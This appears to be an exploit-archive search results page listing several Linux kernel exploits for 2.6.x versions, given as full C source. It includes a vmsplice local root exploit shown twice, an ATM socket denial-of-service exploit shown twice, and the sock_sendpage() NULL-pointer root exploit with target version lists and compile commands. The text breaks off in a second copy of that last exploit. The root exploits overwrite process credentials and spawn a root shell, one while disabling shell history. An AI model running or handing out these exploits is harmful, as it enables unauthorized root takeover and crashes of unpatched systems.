linux 2.6.18
Search result for 'linux 2.6.18'
(0.0684449672699 seconds)
DigitALL/Linux 2.6.18-20 2009 Local Root ( na)
# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux 2.6.18-20 2009 Local Root Exploit\n");
printf(" By DigitALL\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
Linux kernel 2.6.18-20 2009 local root exploit.
DigitALL/2.6.18-20 2009 Local Root Exploit ( linux)
# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux 2.6.18-20 2009 Local Root Exploit\n");
printf(" By DigitALL\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
Adurit-T/Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit ( linux)
/*
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Denial of service Exploit
Vuln : 2.6.27.7-generic || 2.6.18 || 2.6.24-1
Author : Adurit team
>>djekmani4ever
Home : Hightsec.com
patch : http://marc.info/?l=linux-netdev&m=122841256115780&w=2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#define NUM_CPUS 8
#define ATM "/proc/net/atm/avc"
int
main(void)
{
char *err, adurit[2000];
int i, ret, sock, proc;
struct atm_qos dj;
struct sockaddr_atmsvc addr;
sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
memset(&dj, 0, sizeof(dj));
dj.rxtp.traffic_class = ATM_UBR;
dj.txtp.traffic_class = ATM_UBR;
dj.aal = ATM_NO_AAL;
ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));
if (ret == -1) {
printf("failed !\n");
return 1;
}
memset(&addr, 0, sizeof(addr));
addr.sas_family = AF_ATMSVC;
bind(sock, (struct sockaddr *) &addr, sizeof(addr));
listen(sock, 10);
listen(sock, 10);
for (i = 1; i < NUM_CPUS; ++i) {
if (fork() != 0) {
break;
}
}
proc = open(ATM, O_RDONLY);
ret = read(proc, &adurit, 2000);
close(proc);
return 0;
}
// milw0rm.com [2008-12-14]
Adurit-T/Linux Kernel 2.6.27-7-generic Denial Of Service ( na)
/*
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Dos Exploit
ariginal idéé : Jon Oberheide łł
http://www.milw0rm.com/exploits/7405
tested : 2.6.27.7-generic - 2.6.18 - 2.6.24-1
by : ADU-T
patching :
http://marc.info/?l=linux-netdev&m=122841256115780&w=2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#define NUM_CPUS 8
#define ATM "/proc/net/atm/avc"
int
main(void)
{
char *err, adurit[2000];
int i, ret, sock, proc;
struct atm_qos dj;
struct sockaddr_atmsvc addr;
sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
memset(&dj, 0, sizeof(dj));
dj.rxtp.traffic_class = ATM_UBR;
dj.txtp.traffic_class = ATM_UBR;
dj.aal = ATM_NO_AAL;
ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));
if (ret == -1) {
printf("failed !\n");
return 1;
}
memset(&addr, 0, sizeof(addr));
addr.sas_family = AF_ATMSVC;
bind(sock, (struct sockaddr *) &addr, sizeof(addr));
listen(sock, 10);
listen(sock, 10);
for (i = 1; i < NUM_CPUS; ++i) {
if (fork() != 0) {
break;
}
}
proc = open(ATM, O_RDONLY);
ret = read(proc, &adurit, 2000);
close(proc);
return 0;
}
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 local denial of service exploit.
Ramon de Carvalho Valle/Linux sock_sendpage() Local Root Exploit ( na)
/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
* The TASK_RUNNING is the only possible state for a process executing
* in user-space.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int
main(void)
{
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
Linux 2.4 and 2.6 kernel sock_sendpage() local root exploit for powerpc.
Ramon Valle/Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) ( linux)
/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
